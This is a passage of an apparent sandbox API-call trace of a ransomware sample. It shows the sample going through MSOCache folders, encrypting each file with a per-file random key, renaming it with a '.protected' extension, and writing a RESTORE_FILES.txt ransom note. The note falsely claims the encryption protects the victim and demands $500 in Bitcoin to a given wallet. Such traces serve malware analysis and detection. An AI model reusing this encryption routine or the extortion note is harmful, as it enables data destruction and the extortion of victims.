lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.714] CloseHandle (hObject=0xb4) returned 1 [0048.715] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.protected") returned 94 [0048.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.protected")) returned 1 [0048.715] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.715] lstrcmpiW (lpString1="PptLR.cab", lpString2="Windows") returned -1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="Program Files") returned -1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="Program Files (x86)") returned -1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="$Recycle.bin") returned 1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="System Volume Information") returned -1 [0048.716] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.716] StrStrIW (lpFirst="PptLR.cab", lpSrch=".protected") returned 0x0 [0048.716] lstrcmpW (lpString1="PptLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0048.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.716] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0048.717] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.717] StrStrW (lpFirst="PptLR.cab", lpSrch=".txt") returned 0x0 [0048.717] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.717] StrStrW (lpFirst="PptLR.cab", lpSrch=".rar") returned 0x0 [0048.717] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.717] StrStrW (lpFirst="PptLR.cab", lpSrch=".zip") returned 0x0 [0048.717] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.747] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.747] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.748] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.748] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.776] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.776] CloseHandle (hObject=0xb4) returned 1 [0049.308] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.protected") returned 86 [0049.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.protected")) returned 1 [0049.310] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0049.310] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0049.310] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0049.310] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: 
pbBuffer=0x295f12c) returned 1 [0049.310] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.310] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0049.310] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0049.310] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0049.310] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0049.310] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x75e, lpOverlapped=0x0) returned 1 [0049.511] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.511] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x75e, lpOverlapped=0x0) returned 1 [0049.511] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.511] WriteFile (in: 
hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0049.511] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0049.511] CloseHandle (hObject=0xb4) returned 1 [0049.512] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0049.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0049.513] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0049.513] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0049.513] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0049.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0049.513] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0049.513] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0049.514] lstrlenA (lpString="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") returned 684 [0049.514] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0049.514] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0049.514] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0049.514] CloseHandle (hObject=0xa4) returned 1 [0049.515] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0049.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned 66 [0049.515] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0049.515] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0049.515] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned 68 [0049.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0049.735] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0049.735] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0049.735] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0049.735] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0049.735] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0049.735] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.") returned 68 [0049.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.735] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0049.735] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0049.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.735] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.735] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0049.735] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0049.735] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0049.735] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0049.735] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0049.735] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..") returned 69 [0049.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0049.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.735] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0049.735] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0049.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.735] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.735] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.735] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Windows") returned -1 [0049.735] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Program Files") returned 1 [0049.736] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Program Files (x86)") returned 1 [0049.736] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="$Recycle.bin") returned 1 [0049.736] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="System Volume Information") returned -1 [0049.736] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".protected") returned 0x0 [0049.736] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0049.736] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.736] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.736] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0049.736] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 
83 [0049.736] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".txt") returned 0x0 [0049.736] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".rar") returned 0x0 [0049.736] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".zip") returned 0x0 [0049.737] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0049.817] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.817] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0049.817] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.817] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0049.826] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0049.826] CloseHandle (hObject=0xb4) returned 1 [0049.912] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.protected") returned 
93 [0049.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.protected")) returned 1 [0049.912] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.912] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Windows") returned -1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Program Files") returned 1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Program Files (x86)") returned 1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="$Recycle.bin") returned 1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="System Volume Information") returned -1 [0049.913] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".protected") returned 0x0 [0049.913] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0049.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.913] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0049.913] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".txt") returned 0x0 [0049.913] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".rar") returned 0x0 [0049.913] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".zip") returned 0x0 [0049.913] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0050.018] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.018] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0050.018] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.018] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0050.018] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0050.018] CloseHandle (hObject=0xb4) returned 1 [0050.019] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.protected") returned 93 [0050.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.protected")) returned 1 [0050.019] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0050.019] lstrcmpiW (lpString1="PubLR.cab", 